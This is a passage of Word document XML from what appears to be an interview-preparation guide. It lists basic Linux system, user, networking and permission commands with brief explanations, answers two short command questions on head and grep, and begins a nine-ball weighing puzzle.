    <w:p w14:paraId="0F670141"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du file.txt      # Show size of a file</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DA7DF3F"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du -sh directory # Show total size of a directory</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C2C5C6A"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free</w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Displays memory usage.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CE210F8"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free             # Show memory usage</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47B1D85A"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free -h          # Show in human-readable format</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CC5E1DF"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uptime</w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Shows how long the system has been running.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E76CE14"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uptime           # Shows the system's uptime and load averages</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4ECC933B"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who</w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Displays who is logged into the system.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19392098"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who              # Shows who is logged into the system</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FA418BF"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top</w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Displays system resources and process statistics dynamically.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="155633B4"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op              # Displays system processes and resources</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="270A2B7A" w14:textId="77777777" w:rsidR="00603AFC" w:rsidRPr="00617E2C" w:rsidRDefault="00603AFC"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5. User Management Commands</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C32ABCE"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useradd</w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Adds a new user.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EF5D86C"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useradd username  # Create a new user</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="487C983A"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asswd</w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Changes a user’s password.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EE8BF9C"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passwd username   # Change password for a specific user</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="720BBC01"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usermod</w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Modifies a user account.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="473867C7"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usermod -aG group username   # Add user to a group</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59F2090B"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groupadd</w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Adds a new group.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3551DD56"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groupadd groupname  # Create a new group</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20A50D20"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id</w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Displays user and group IDs.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76F55924"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d username       # Shows user and group ID</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D69B616" w14:textId="77777777" w:rsidR="00603AFC" w:rsidRPr="00617E2C" w:rsidRDefault="00603AFC"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6. Networking Commands</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B7B3526"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ping</w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Sends ICMP echo requests to test connectivity.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60B2AD66"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ping google.com    # Ping google.com to check connectivity</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41B2FD8B"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ifconfig</w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Displays or configures network interfaces (older command, replaced by ip).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AB58F06"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fconfig           # Show network interfaces and their IP addresses</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="723C7E44"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ip</w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: A more modern way to configure network interfaces.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15C4F389"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p addr show       # Show network interfaces and their IP addresses</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FBF99EC"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netstat</w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Displays network connections, routing tables, and interface statistics.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3480D3B1"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netstat -tuln      # Show all active network connections and listening ports</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D4608CA"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url</w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Transfers data from or to a server using various protocols (HTTP, FTP, etc.).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12CBFEE8"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url http://example.com   # Fetch data from a URL</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36FED5BC"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wget</w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Downloads files from the internet.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="695A63C3"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wget http://example.com/file.zip  # Download a file from the internet</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BB22135" w14:textId="77777777" w:rsidR="00603AFC" w:rsidRPr="00617E2C" w:rsidRDefault="00603AFC" w:rsidP="00617E2C">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>7. File Permissions Commands</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BB0C147"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hmod</w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Changes file permissions.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16F37E29"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hmod 755 file.txt     # Change file permissions (rwxr-xr-x)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="163BBBAC"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hmod +x file.sh       # Give execute permission to a file</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C9B619F"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hown</w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Changes the ownership of a file or directory.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FFCC3B7"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hown user:group file.txt    # Change file owner to 'user' and group to 'group'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EED0ABC"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b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>chgrp</w:t>
      </w:r>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Changes the group ownership of a file or directory.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46C1C489"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chgrp group file.txt       # Change the group ownership of the file</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="129D8760" w14:textId="77777777" w:rsidR="00603AFC" w:rsidRPr="00617E2C" w:rsidRDefault="00000000" w:rsidP="00617E2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1D45ADA">
          <v:rect id="_x0000_i3659" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="405F2BEA"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lastRenderedPageBreak/>
        <w:t>These are just a few of the many available Linux commands. Each command comes with various options and flags that modify its behavior. For a more detailed list and usage of a command, you can always check its manual page using the man command (e.g., man ls for the manual of the ls command).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70381246" w14:textId="49E7016A" w:rsidR="00BB0C71" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="00BB0C71">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:pict w14:anchorId="7E7E2F3C">
          <v:rect id="_x0000_i3660" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BA2D955" w14:textId="3A84D059" w:rsidR="005F7378" w:rsidRPr="00CE4B95" w:rsidRDefault="001072AE">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="909" w:name="_Toc196308389"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>Command - Read a file and print first two lines from file Ans. head -2 filename</w:t>
      </w:r>
      <w:r w:rsidR="005F7378" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="909"/>
    </w:p>
    <w:p w14:paraId="28BCD059" w14:textId="760D3E58" w:rsidR="00603AFC" w:rsidRPr="00617E2C" w:rsidRDefault="00603AFC" w:rsidP="00617E2C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:num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Yes, the correct command to read a file and print the first two lines is:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E91A51F"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head -n 2 filename</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64787857"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head is the command used to display the first few lines of a file.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CAD98F6"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he -n 2 option specifies that only the first 2 lines should be displayed.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AD22322"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Alternatively, you can use:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A9A9C4D"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head -2 filename</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="786B24B7" w14:textId="77777777" w:rsidR="00603AFC" w:rsidRPr="00617E2C" w:rsidRDefault="00603AFC"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Both commands will achieve the same result.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73FAC24C" w14:textId="4F11AC5B" w:rsidR="00BB0C71" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="00BB0C71">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:pict w14:anchorId="093EF38A">
          <v:rect id="_x0000_i3661" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E7FBB3B" w14:textId="4F185398" w:rsidR="008A7CBE" w:rsidRPr="00CE4B95" w:rsidRDefault="009E1D31">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="910" w:name="_Toc196308390"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>Search a word from a file</w:t>
      </w:r>
      <w:r w:rsidR="008A7CBE" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="910"/>
    </w:p>
    <w:p w14:paraId="153E9AF5" w14:textId="76C241D8" w:rsidR="008A7CBE" w:rsidRPr="00617E2C" w:rsidRDefault="00FC58F7" w:rsidP="00617E2C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>grep 'word' filename ack 'pattern' /path/to/file.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FDCD440" w14:textId="77777777" w:rsidR="00BB0C71" w:rsidRPr="00617E2C" w:rsidRDefault="00BB0C71" w:rsidP="00617E2C">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2FBFF742" w14:textId="77777777" w:rsidR="002D2F4B" w:rsidRPr="00617E2C" w:rsidRDefault="002D2F4B"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o search for a word in a file, you can use the grep command in Linux. Here's the syntax:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="727D7331" w14:textId="77777777" w:rsidR="002D2F4B" w:rsidRPr="00617E2C" w:rsidRDefault="002D2F4B"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grep "word" filename</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51B9254C" w14:textId="77777777" w:rsidR="002D2F4B" w:rsidRPr="00617E2C" w:rsidRDefault="002D2F4B"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grep is used to search for patterns in files.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46D8B03F" w14:textId="77777777" w:rsidR="002D2F4B" w:rsidRPr="00617E2C" w:rsidRDefault="002D2F4B"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word" is the word or pattern you're searching for (replace this with your actual search term).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01EE4059" w14:textId="77777777" w:rsidR="002D2F4B" w:rsidRPr="00617E2C" w:rsidRDefault="002D2F4B"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filename is the name of the file in which you want to search for the word.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C27598B" w14:textId="77777777" w:rsidR="002D2F4B" w:rsidRPr="00617E2C" w:rsidRDefault="002D2F4B"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For example, to search for the word "hello" in a file named file.txt, the command would be:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CA300B6" w14:textId="77777777" w:rsidR="002D2F4B" w:rsidRPr="00617E2C" w:rsidRDefault="002D2F4B"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grep "hello" file.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="145F4772" w14:textId="77777777" w:rsidR="002D2F4B" w:rsidRPr="00617E2C" w:rsidRDefault="002D2F4B"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If you want to make the search case-insensitive, you can use the -i flag:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2644A7AC" w14:textId="77777777" w:rsidR="002D2F4B" w:rsidRPr="00617E2C" w:rsidRDefault="002D2F4B"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grep -i "hello" file.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32E1415C" w14:textId="77777777" w:rsidR="002D2F4B" w:rsidRPr="00617E2C" w:rsidRDefault="002D2F4B"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To display the line numbers where the word appears, you can use the -n flag:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06953207" w14:textId="77777777" w:rsidR="002D2F4B" w:rsidRPr="00617E2C" w:rsidRDefault="002D2F4B" w:rsidP="00617E2C">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617E2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>grep -n "hello" file.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BE571FA" w14:textId="2FFE8128" w:rsidR="00BB0C71" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="00BB0C71">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:pict w14:anchorId="7463B408">
          <v:rect id="_x0000_i3662" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A16913E" w14:textId="38AC6BA3" w:rsidR="002D2F4B" w:rsidRPr="00CE4B95" w:rsidRDefault="002D2F4B">
      <w:pPr>
        <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E564FD2" w14:textId="30411457" w:rsidR="002B15DE" w:rsidRPr="00CE4B95" w:rsidRDefault="0006226F" w:rsidP="002B15DE">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="911" w:name="_Toc196308391"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Puzzles</w:t>
      </w:r>
      <w:bookmarkEnd w:id="911"/>
    </w:p>
    <w:p w14:paraId="3FA2DA04" w14:textId="45AE01FD" w:rsidR="00340E57" w:rsidRPr="00CE4B95" w:rsidRDefault="00340E57">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="912" w:name="_Toc196308392"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>Puzzle – 1</w:t>
      </w:r>
      <w:bookmarkEnd w:id="912"/>
    </w:p>
    <w:p w14:paraId="35752902" w14:textId="5B329C4B" w:rsidR="0006226F" w:rsidRPr="00CE4B95" w:rsidRDefault="00FF5640" w:rsidP="001576F0">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>Weighing the 9 balls puzzle, find the heavier ball among 9 balls. How many max iterations will it be required to find the heavier ball?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AB30F76" w14:textId="765136C7" w:rsidR="0006226F" w:rsidRPr="00CE4B95" w:rsidRDefault="00E00477">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>A</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="040CDC72" w14:textId="77777777" w:rsidR="00E00477" w:rsidRPr="00CE4B95" w:rsidRDefault="00E00477" w:rsidP="00E00477">
      <w:pPr>
        <w:ind w:left="360"/>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ep 1</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Divide 9 balls into 3 groups of 3.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C71A261" w14:textId="77777777" w:rsidR="00E00477" w:rsidRPr="00CE4B95" w:rsidRDefault="00E00477" w:rsidP="00E00477">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1280"/>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Weigh Group 1 vs Group 2.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E6F6072" w14:textId="77777777" w:rsidR="00E00477" w:rsidRPr="00CE4B95" w:rsidRDefault="00E00477" w:rsidP="00E00477">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:rPr>
